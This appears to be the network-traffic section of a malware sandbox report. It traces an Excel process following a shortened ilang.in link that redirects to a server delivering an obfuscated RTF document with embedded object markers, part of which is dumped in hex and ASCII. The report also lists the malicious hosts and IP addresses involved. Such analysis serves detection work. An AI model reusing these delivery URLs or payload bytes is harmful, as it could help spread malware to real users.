                Jul 2, 2024 07:53:41.871062040 CEST8049178194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:42.871073961 CEST8049178194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:42.871725082 CEST49179443192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:42.871778011 CEST44349179194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:42.871831894 CEST49179443192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:42.872508049 CEST49179443192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:42.872523069 CEST44349179194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:43.086874008 CEST8049178194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:43.087066889 CEST4917880192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:43.796623945 CEST44349179194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:43.799298048 CEST49179443192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:43.803188086 CEST49179443192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:43.803216934 CEST44349179194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:43.803544998 CEST44349179194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:43.805083036 CEST49179443192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:43.848510027 CEST44349179194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:44.411670923 CEST44349179194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:44.411761999 CEST44349179194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:44.411844969 CEST49179443192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:44.411912918 CEST44349179194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:44.412036896 CEST49179443192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:46.661741972 CEST8049178194.163.41.117192.168.2.22
                Jul 2, 2024 07:53:46.661891937 CEST4917880192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:46.661931992 CEST4917880192.168.2.22194.163.41.117
                Jul 2, 2024 07:53:46.666783094 CEST8049178194.163.41.117192.168.2.22
                Jul 2, 2024 07:54:06.283710003 CEST4917280192.168.2.22194.163.41.117
                Jul 2, 2024 07:54:06.283760071 CEST4917380192.168.2.2223.95.235.16
                TimestampSource PortDest PortSource IPDest IP
                Jul 2, 2024 07:52:22.385013103 CEST5456253192.168.2.228.8.8.8
                Jul 2, 2024 07:52:22.396332979 CEST53545628.8.8.8192.168.2.22
                Jul 2, 2024 07:52:27.556359053 CEST5291753192.168.2.228.8.8.8
                Jul 2, 2024 07:52:27.571505070 CEST53529178.8.8.8192.168.2.22
                Jul 2, 2024 07:52:30.910552979 CEST6275153192.168.2.228.8.8.8
                Jul 2, 2024 07:52:30.920507908 CEST53627518.8.8.8192.168.2.22
                Jul 2, 2024 07:52:30.922681093 CEST5789353192.168.2.228.8.8.8
                Jul 2, 2024 07:52:30.929745913 CEST53578938.8.8.8192.168.2.22
                Jul 2, 2024 07:52:38.916449070 CEST5482153192.168.2.228.8.8.8
                Jul 2, 2024 07:52:39.110493898 CEST53548218.8.8.8192.168.2.22
                Jul 2, 2024 07:52:39.112051010 CEST5471953192.168.2.228.8.8.8
                Jul 2, 2024 07:52:39.119105101 CEST53547198.8.8.8192.168.2.22
                Jul 2, 2024 07:52:52.076891899 CEST4988153192.168.2.228.8.8.8
                Jul 2, 2024 07:52:52.088459015 CEST53498818.8.8.8192.168.2.22
                Jul 2, 2024 07:53:41.842271090 CEST5499853192.168.2.228.8.8.8
                Jul 2, 2024 07:53:41.849464893 CEST53549988.8.8.8192.168.2.22
                Jul 2, 2024 07:53:41.852624893 CEST5278153192.168.2.228.8.8.8
                Jul 2, 2024 07:53:41.859128952 CEST53527818.8.8.8192.168.2.22
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 2, 2024 07:52:22.385013103 CEST192.168.2.228.8.8.80xc358Standard query (0)ilang.inA (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:27.556359053 CEST192.168.2.228.8.8.80x2e28Standard query (0)ilang.inA (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:30.910552979 CEST192.168.2.228.8.8.80xda30Standard query (0)ilang.inA (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:30.922681093 CEST192.168.2.228.8.8.80x5cb8Standard query (0)ilang.inA (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:38.916449070 CEST192.168.2.228.8.8.80x1100Standard query (0)ilang.inA (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:39.112051010 CEST192.168.2.228.8.8.80x2664Standard query (0)ilang.inA (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:52.076891899 CEST192.168.2.228.8.8.80x4e9dStandard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                Jul 2, 2024 07:53:41.842271090 CEST192.168.2.228.8.8.80xd97eStandard query (0)ilang.inA (IP address)IN (0x0001)false
                Jul 2, 2024 07:53:41.852624893 CEST192.168.2.228.8.8.80x9c5bStandard query (0)ilang.inA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 2, 2024 07:52:22.396332979 CEST8.8.8.8192.168.2.220xc358No error (0)ilang.in194.163.41.117A (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:27.571505070 CEST8.8.8.8192.168.2.220x2e28No error (0)ilang.in194.163.41.117A (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:30.920507908 CEST8.8.8.8192.168.2.220xda30No error (0)ilang.in194.163.41.117A (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:30.929745913 CEST8.8.8.8192.168.2.220x5cb8No error (0)ilang.in194.163.41.117A (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:39.110493898 CEST8.8.8.8192.168.2.220x1100No error (0)ilang.in194.163.41.117A (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:39.119105101 CEST8.8.8.8192.168.2.220x2664No error (0)ilang.in194.163.41.117A (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:52.088459015 CEST8.8.8.8192.168.2.220x4e9dNo error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
                Jul 2, 2024 07:52:52.088459015 CEST8.8.8.8192.168.2.220x4e9dNo error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
                Jul 2, 2024 07:53:41.849464893 CEST8.8.8.8192.168.2.220xd97eNo error (0)ilang.in194.163.41.117A (IP address)IN (0x0001)false
                Jul 2, 2024 07:53:41.859128952 CEST8.8.8.8192.168.2.220x9c5bNo error (0)ilang.in194.163.41.117A (IP address)IN (0x0001)false
                • uploaddeimagens.com.br
                • ilang.in
                • 23.95.235.16
                • 41.216.183.13
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.2249163194.163.41.117801220C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:22.411312103 CEST320OUTGET /BrlcB HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: ilang.in
                Connection: Keep-Alive
                Jul 2, 2024 07:52:26.539833069 CEST766INHTTP/1.1 301 Moved Permanently
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                x-powered-by: PHP/7.4.33
                set-cookie: PHPSESSID=8b51a2824e2d67447be73aaff78b43b8; path=/
                expires: Thu, 19 Nov 1981 08:52:00 GMT
                cache-control: no-store, no-cache, must-revalidate
                pragma: no-cache
                set-cookie: short_1359230=1; expires=Tue, 02-Jul-2024 06:07:26 GMT; Max-Age=900; path=/; HttpOnly
                location: http://23.95.235.16/88077/ima/ima.imim.im.imim.doC
                content-type: text/html; charset=UTF-8
                content-length: 0
                date: Tue, 02 Jul 2024 05:52:26 GMT
                server: LiteSpeed
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.224916423.95.235.16801220C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:26.564327002 CEST349OUTGET /88077/ima/ima.imim.im.imim.doC HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 23.95.235.16
                Connection: Keep-Alive
                Jul 2, 2024 07:52:27.062352896 CEST1236INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 05:52:26 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                Last-Modified: Tue, 02 Jul 2024 01:09:30 GMT
                ETag: "336e9-61c395daffd01"
                Accept-Ranges: bytes
                Content-Length: 210665
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/msword
                Data Raw: 7b 5c 72 74 66 31 0d 09 09 09 09 09 09 09 09 7b 5c 2a 5c 75 72 74 66 33 34 37 33 36 31 36 31 39 20 5c 5f 7d 0d 7b 5c 39 34 33 36 35 38 37 36 34 60 2a 33 5e 7c 3b 5e 7c 7c 25 28 a7 33 36 5d 30 34 38 28 5e 35 29 5f 3f 2e 3b 2b 26 25 26 28 25 5e a7 31 2f 23 25 27 2c 3b 39 3d 5f 3a 2a 7c b0 2d 5e 40 3a 23 31 25 2b 31 2f 3f 23 2c 35 23 33 32 5d 33 2a b0 3c 5d 3f 38 28 37 a7 34 5e a7 26 3f 2b 35 29 32 23 7c 7e 7e 31 21 25 33 31 60 3f 31 3b 2c 60 34 2d 3f 33 36 2f 2d 35 3f 5f 30 2b 3f 2d 2d 60 3f 3f 3f 36 2e 25 60 35 33 21 40 28 b0 60 3b 33 2c 3f 2e 5f 2b 37 26 7e 26 26 5d 2e 2a 5e 3b 3f 60 31 2f 2d 7e 40 37 3f 33 35 35 21 2f 3f 2d 3e 3f 26 40 b5 5e 5d 3b 26 b0 34 5f 2a 3f 5d 27 5f 3d 33 3f 5d 33 36 3f 30 3f 35 5d 3b 5f 30 3f 3f 21 3b 5e 31 5d 26 5b 3a 7e a7 31 3f 2c 33 32 2f 30 24 5e 33 3d 2a 2d 3f 32 b5 40 37 40 2e 37 3e 7c 35 35 23 37 25 34 28 3f 5f 37 a7 2b 5f 36 2b 24 3d 3f 28 37 3f 2f 3e 34 31 3f 3f 36 24 5f 7e 2e 32 2a 31 5d 24 3f 27 34 3b 60 b5 7e 33 34 3f 3e 31 a7 3a 27 37 5e 7e 25 25 5f 2b 7c 3f [TRUNCATED]
                Data Ascii: {\rtf1{\*\urtf347361619 \_}{\943658764`*3^|;^||%(36]048(^5)_?.;+&%&(%^1/#%',;9=_:*|-^@:#1%+1/?#,5#32]3*<]?8(74^&?+5)2#|~~1!%31`?1;,`4-?36/-5?_0+?--`???6.%`53!@(`;3,?._+7&~&&].*^;?`1/-~@7?355!/?->?&@^];&4_*?]'_=3?]36?0?5];_0??!;^1]&[:~1?,32/0$^3=*-?2@7@.7>|55#7%4(?_7+_6+$=?(7?/>41??6$_~.2*1]$?'4;`~34?>1:'7^~%%_+|?(=9*|&:?;5~-#`%,%@)2<10*|]%>)?=+,)&*?%!%]>_7]08%|?9^!]|$3|<^^/]8/3|?^4+,[:0|??<1(??+:|$/@57$^>,:#%4?3%?(''>3(^$7|)9@&|)/_.?+?^%38(,@^??4/?<=.@_]?#~+@?<#6;,4+4%!/![*_4!(?7?%.:=/&@?0?!?&,*6[,0!7>+`?>1%35<#@@%.?--<+<<1-~,=4=/-;^$5^?3[.32_!8%?6~_?]+@71!9?29+]'%~>5>:$/2`-(%7+#?2>1@;@.3#+9?`#^7~^?=^2!]]9=-_@5(<[5,|>|1$?<&:+:7_48:87+/?+3<>!+&&72_9]3@)8>6=5?44:+4<+?23_|**+7@#)?8?<?&<&07*2?|>|1[#,!$[9=`1`,4?+7@>-[!,-2_2[?5#|;73^8[[#(?+%8)+|%5%=+?%&5?,2&?15;]^!'?-0(>)2?^!'(%`*22*%??1>286!??[*;?09)2]=,;$@~/?5&?/;,;??~@,[-?(9`%;>'!?~@@?
                Jul 2, 2024 07:52:27.062407970 CEST1236INData Raw: 2a 40 2e a7 2f 3f 34 5e 25 7c 35 21 31 3f 5b 3d 30 38 3f 26 5f 24 3b 3f 39 5f 40 34 31 23 3c 3f 27 a7 39 37 37 27 36 2d 2c 27 60 2d 3e 28 2d 34 2e 37 26 34 2e 3b 30 25 23 3f b0 3f 5d 2d 5f 39 26 34 25 21 2d 7e 25 3e 37 b5 36 2d 26 3c 5d 39 24 3c
                Data Ascii: *@./?4^%|5!1?[=08?&_$;?9_@41#<?'977'6-,'`->(-4.7&4.;0%#??]-_9&4%!-~%>76-&<]9$</6#?]!4;_%84%?2?=?*2?[+=.&%$20[(,$<1*9~@),?[`?=)48%.~5,>->!`*3[?3?->??#;3=_?',%@$,+?$?*4?[2]<%|'8?1??^4#640?48>@+_*/~]9'%%6?%?#&1>63!#4/@2&%?-?!69%97?&+'$?
                Jul 2, 2024 07:52:27.062419891 CEST1236INData Raw: 24 5f 60 25 3f 3d 35 b0 b0 60 2b 29 7c 3f 38 5b 2b 25 25 5d 24 3a 5e 3f 2a 3b 31 23 31 26 5b 25 3c 3e 5f 2e a7 3e 60 34 33 36 32 3a 37 34 a7 33 27 3f 5e 36 5d 2f b5 23 2c 32 32 b5 3f 5f 2e 21 27 3f 39 5d 35 29 36 3d 39 3e 5b 30 5b 3f b0 5f 3b 30
                Data Ascii: $_`%?=5`+)|?8[+%%]$:^?*;1#1&[%<>_.>`4362:743'?^6]/#,22?_.!'?9]5)6=9>[0[?_;0(?1=#>:4*2<|55+497)%)>+^<;=;$^*>)06?&2]2*'5~)71'_<~:-?)5<6?]|56',+'%_,(-/$3_@/+#'-57*/@~|[,^0;^_%4?/2(#22~!?*?|-&0&2-&$29~:|?;2/:!6$;??831`4/3/-0.,1?^8,:$
                Jul 2, 2024 07:52:27.062757969 CEST672INData Raw: 3c 32 40 23 25 b5 3f 21 33 32 b0 7e 2a 32 37 32 2e 7c b5 5d 2a 5e 3f 3f b5 5b 3f 26 30 3f 24 5b 5e 5e 39 37 25 b5 25 29 2d a7 26 2f 3f 5e 5f b0 5d 2f 3f 3b 37 32 25 25 3e 28 2a 32 36 3f 40 2e 2f 27 31 b5 2d 30 23 27 29 37 3a 26 24 34 3f 25 5f a7
                Data Ascii: <2@#%?!32~*272.|]*^??[?&0?$[^^97%%)-&/?^_]/?;72%%>(*26?@./'1-0#')7:&$4?%_??:1^5?0?0'2?>~?1*[9%>%9`#).(2*,'^*`]<.)0;@9]*5~$=%8!~$'+;>#9?|?17/.=[.9^[?>?198*,2?|%*~_1$+[%7=6/_60~?#,2@39)[%?0<94[/05(:>|%]$`&-`)^6|?`2(%~?87??1!;0
                Jul 2, 2024 07:52:27.062769890 CEST1236INData Raw: 24 40 3f 2e 23 7c 5e 7e 32 38 b5 3c 27 27 33 29 2b 27 23 33 23 2d 5f 39 24 3c 5b 3f 3f 27 40 40 3b 40 31 24 40 36 3e 5e 25 28 39 23 60 7e 33 b0 7c 21 21 23 33 2b 3d 3f 2b 5f 40 3f 21 29 5b 34 32 3e 7c 2f 5d 3f 38 b5 23 60 b5 3f 3f 26 b5 26 5e 3a
                Data Ascii: $@?.#|^~28<''3)+'#3#-_9$<[??'@@;@1$@6>^%(9#`~3|!!#3+=?+_@?!)[42>|/]?8#`??&&^:=23'@`[*_:%!#2~*#/-?8.-0=9/=~@5(^_$]5'6:*24^?8?;??-[=#0(_*'$^?#$[~)^)~7.&(%*0?!>250).>.:>)_(3_56'&|$/42&($7^2;,#)^/?08!^</6_`^?|`%'.|22#@|28!??@*#~8:?[36]
                Jul 2, 2024 07:52:27.062781096 CEST1236INData Raw: 3f 5d 7e 33 3c 34 3f 3e 25 b5 40 34 5b 40 31 2f 60 25 5e 39 31 26 3e 2d 27 27 39 34 a7 7c b5 21 2e 3d 3a 3e 2b 60 27 26 b0 2d 40 3e 3f 21 24 5d 36 3e 27 3d 30 31 3f 3f 32 a7 7e 3f 25 a7 5b 24 35 2d 33 5b 35 2d b5 24 3f b5 3f 39 3a 36 21 30 33 3e
                Data Ascii: ?]~3<4?>%@4[@1/`%^91&>-''94|!.=:>+`'&-@>?!$]6>'=01??2~?%[$5-3[5-$??9:6!03>>8/*#~0@3?2&&^!()5`%*4(][?;+!*$`;$*6;==+[&?~4?`?/^;(]??)]|?=9@#:?&8*@:]&6!__=!(:?_@?,(8$[$89!><?.$@|*2?,(?/1$384%,3)!(>_>^?4>96||4/-8*(]>8?#:?)1(%_5@
                Jul 2, 2024 07:52:27.062793016 CEST1236INData Raw: 3a 28 31 3f 5e 2a 21 3b 35 33 a7 5d 2b b5 3f 23 2b 2f 3c 26 3d 3e 38 3f 26 24 3f 7c 3f 28 5b 60 23 2d 2f 3c 3f a7 2a 5d 3a 3f 26 39 3f 29 2e 36 31 40 2f 7c 39 3d 38 b5 3c 26 7c a7 30 30 25 27 31 37 3f 3e 3f 3e 32 b5 7c 3f 31 28 a7 3a 3f 32 2b 31
                Data Ascii: :(1?^*!;53]+?#+/<&=>8?&$?|?([`#-/<?*]:?&9?).61@/|9=8<&|00%'17?>?>2|?1(:?2+193?(:(?](;1|(@9%`(%:|&|,:+8@9/=';@^&3;&56['[/-!|8?,;_?&4`.?6/:#,,'=9/.@<*?7?85[#^9`9?|2<&?@]?,:-%3^=5^7&-?61/'?+,.7[99~2@``??:[!=21@,.9'|!942:,%<
                Jul 2, 2024 07:52:27.062805891 CEST1236INData Raw: a7 37 39 5b 2b 3b 33 5e 32 27 2a b0 2a 2a 3f 7e 5d 3f 5d 37 3a 3f 3f b0 3b 38 38 b5 40 32 60 5b b0 24 5d 7c 2c b5 2c 2e 2a 28 60 2e 3e 2a 36 24 a7 3b 2d 28 34 3e 2e 38 2b 2c 2d 23 3f 2b a7 3f 2f 23 7c 5e 3f 2b 30 34 5e 5d 7c 7e 2c 2a 7c 3d 5d 3d
                Data Ascii: 79[+;3^2'***?~]?]7:??;88@2`[$]|,,.*(`.>*6$;-(4>.8+,-#?+?/#|^?+04^]|~,*|=]=@?6?2+/*?<]^</==:2;..():0>8=:!?1<-#$?/|'~.#0??-1;78;?)8$#6=66>0`.=.9-@%>^.>*/%8+_^@/-~$7&<;>$4[*744@%\object54326198\objautlink37222776\objw6165\objh2668
                Jul 2, 2024 07:52:27.063477039 CEST1236INData Raw: 09 09 20 20 20 20 20 09 09 09 20 20 09 09 20 20 20 20 09 09 09 09 09 20 09 20 20 09 20 30 30 30 30 30 0a 0d 0d 0d 0a 0d 0d 0a 0d 0a 30 35 36 09 20 09 20 09 20 20 09 09 20 20 09 20 09 09 09 09 20 09 09 20 20 09 20 20 20 09 09 09 20 09 09 20 09 20
                Data Ascii: 00000056 4 66
                Jul 2, 2024 07:52:27.063491106 CEST1236INData Raw: 0d 0a 30 09 20 09 20 09 20 20 09 20 09 09 09 20 09 20 09 20 09 20 20 20 20 09 09 20 09 09 09 09 20 09 20 09 09 20 20 09 09 20 20 09 20 09 09 09 20 09 09 20 20 09 09 09 20 09 09 09 20 20 20 20 09 09 09 20 09 20 09 20 09 09 20 63 0d 0a 0d 0a 0a 0a
                Data Ascii: 0 cf11e 0a
                Jul 2, 2024 07:52:27.068687916 CEST1236INData Raw: 09 09 20 30 0a 0d 0d 0d 0a 0d 0d 0a 0d 0a 30 20 20 20 20 09 20 09 09 09 20 20 09 20 20 09 09 09 09 09 20 20 20 20 09 09 09 09 20 09 09 20 09 09 20 09 09 20 20 09 20 20 20 20 09 09 09 20 09 09 20 20 20 09 20 20 20 20 09 09 09 09 09 09 20 20 20 09
                Data Ascii: 00 00 000 00


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.2249165194.163.41.117803288C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:27.579770088 CEST155OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: ilang.in
                Content-Length: 0
                Connection: Keep-Alive
                Cookie: short_1359230=1
                Jul 2, 2024 07:52:28.470932961 CEST1216INHTTP/1.1 301 Moved Permanently
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                content-type: text/html
                content-length: 795
                date: Tue, 02 Jul 2024 05:52:28 GMT
                server: LiteSpeed
                location: https://ilang.in/
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.2249166194.163.41.117803288C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:29.023859024 CEST155OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: ilang.in
                Content-Length: 0
                Connection: Keep-Alive
                Cookie: short_1359230=1
                Jul 2, 2024 07:52:29.937386990 CEST1216INHTTP/1.1 301 Moved Permanently
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                content-type: text/html
                content-length: 795
                date: Tue, 02 Jul 2024 05:52:29 GMT
                server: LiteSpeed
                location: https://ilang.in/
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.2249167194.163.41.117803288C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:52:29.952497959 CEST155OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: ilang.in
                Content-Length: 0
                Connection: Keep-Alive
                Cookie: short_1359230=1
                Jul 2, 2024 07:52:30.841842890 CEST1216INHTTP/1.1 301 Moved Permanently
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                content-type: text/html
                content-length: 795
                date: Tue, 02 Jul 2024 05:52:30 GMT
                server: LiteSpeed
                location: https://ilang.in/
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
